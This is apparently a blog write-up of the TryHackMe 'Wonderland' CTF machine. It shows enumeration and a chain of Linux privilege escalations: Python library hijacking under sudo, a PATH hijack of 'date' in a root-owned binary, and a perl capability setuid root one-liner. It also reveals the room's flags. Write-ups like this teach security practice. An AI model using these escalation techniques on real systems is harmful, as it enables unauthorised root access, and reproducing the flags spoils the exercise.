Wonderland – a tryhackme.com writeup

user hopping

The interesting thing with this machine is that there are quite a few users involved that we must own step by step to finally get to root. You can find the machine over at tryhackme.com

Lets dive right in and start with a portscan.

sudo nmap -sV 10.10.45.109

So – only web and ssh. Since we cant do much with ssh without any credentials lets look at the web first. And wile we look at the webpage we run gobuster

gobuster dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url 10.10.45.109 -x php,txt,html,js,pdf

The website doesnt reveal anything – neither does the source code of the page.

There is only the hint to “follow the white rabbit”

Let’s look at what gobuster revealed:

Thats also not to exciting. The img directory unveals images as expected so lets look at /r first

There is a page saying “keep going”

So let’s try gobuster one more time – this time on the /r directory.

gobuster dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url 10.10.45.109/r -x php,txt,html,js,pdf

Hm. We have /r and /a now.

And again the page under /r/a tells us to get going.

So one last time:

gobuster dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url 10.10.45.109/r/a -x php,txt,html,js,pdf

So the First page told us to “follow the white rabbit” and we have a URL now that reads /r/a/b and all those pages tell us to keep going.

We will take an educated guess here and try if we find anything at /r/a/b/b/i/t

Ok. another AiW quote. Not much to see. Let’s look at the source code.

<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>

Finally something interesting.

We will try these credentials on the ssh server that we found earlier.

ssh -l alice 10.10.45.109

That worked – let’s look around.

There are a couple of interesting things here.

We are user alice and looking at our home directory.

There is the root.txt flag – but we cant read it.

There is no user.txt flag but there is this weird walrus_and_the_carpenter.py that is also owned by root.

Let’s first see what sudo can do for us:

sudo -l

so we can run /home/alice/walrus_and_the_carpenter.py as user rabbit. Thats at least something.

So lets look at the code

vi walrus_and_the_carpenter.py

We cut it off here because this is already the interesting part.

We cannot change the file – but we see it is importing a library here: random

So the goal is now to create a python library that gives us a shell and to sneak it in instead of the original library.

Python looks for libraries in the current directoy first. So lets try.

echo -n 'import os;os.system("/bin/bash")' > random.py

So we know from earlier that we have to run this command as user rabbit – if we did everything right we should be the user rabbit after running walrus_and_the_carpenter.py

Let’s try that:

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

Since we are user rabbit now lets look into his home directory.

cd /home/rabbit
ls -la

Seems like we should look at the file teaParty which is owned by root but executable by everybody. Thats interesting.

Lets use the strings command to look into it

Hm. That didn’t work. The strings command is not installed. So we have to get the teaParty file to our local system to look into it.

We already know that we can use python so we do a simple

python3 -m http.server

Wich brings up a simple webserver in the current directory listening on port 8000

On our local machine we then do a wget to download the file

wget http://10.10.45.109:8000/teaParty

Now we can inspect the file as planned

What we are looking for is something similar to what we looked for in the source code of the python file earlier

strings teaParty

reveals an interesting line:

/bin/echo -n 'Probably by ' && date --date='next hour' -R

echo is called by using it’s absolute path – but date is not.

So if we create a file by that name that gives us a shell when executed and manipulate the PATH variable – that should work.

echo "/bin/bash" > date
chmod +x date
export PATH=/home/rabbit:$PATH

So now when we execute teaParty it will use the PATH variable to find the date command. The first place it will look is now /home/rabbit where it finds our “version” of the date command and use that instead of the “correct” version.

That should give us the shell then.

Lets try.

./teaParty

Great. That worked as expected. We are now user hatter.

Let’s look into his home directory.

cd /home/hatter
la -la

We see a file called password.txt in there. Lets cat it out:

cat password.txt

Now that we have his password – let’s become hatter:

su hatter

Being a bit stuck here let’s look around what files belong to the group hatter that we are now part off

find / -group hatter 2>/dev/null | more

Now this is interesting. Besides the files in out home directory the files /usr/bin/perl5.26.1 and /usr/bin/perl are also belonging to the group hatter. (the things below are just noise)

Let’s look at them with getcap to see if they have special capabilities.

We will talk about capabilities in a later article – for now its enough to know thats its an addition to the linux permission system and it used carelessly can be exploitet.

getcap /usr/bin/perl5.26.1
getcap /usr/bin/perl

That looks good. Now that we know that we can go to

https://gtfobins.github.io/gtfobins/perl/#capabilities

and look for help.

There is something for us so let’s try it right away:

/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

Finally root. That was a long way. Let’s collect the flags now.

We remember that the root flag was in /home/alice

cat /home/alice/root.txt
thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}

Since the root flag was in a home directory of a user, let’s look if the user flag is in the hone directory of root

cat /root/user.txt
thm{"Curiouser and curiouser!"}

Conclusion

That was a long one. We had to go from user alice to user rabbit, then to hatter so we finally would get root.

The fun thing is that throughout the process we use a couple of different techniques for privilege escalation.

As always: let me know what you think in the comments below.

Leave a Reply

Your email address will not be published.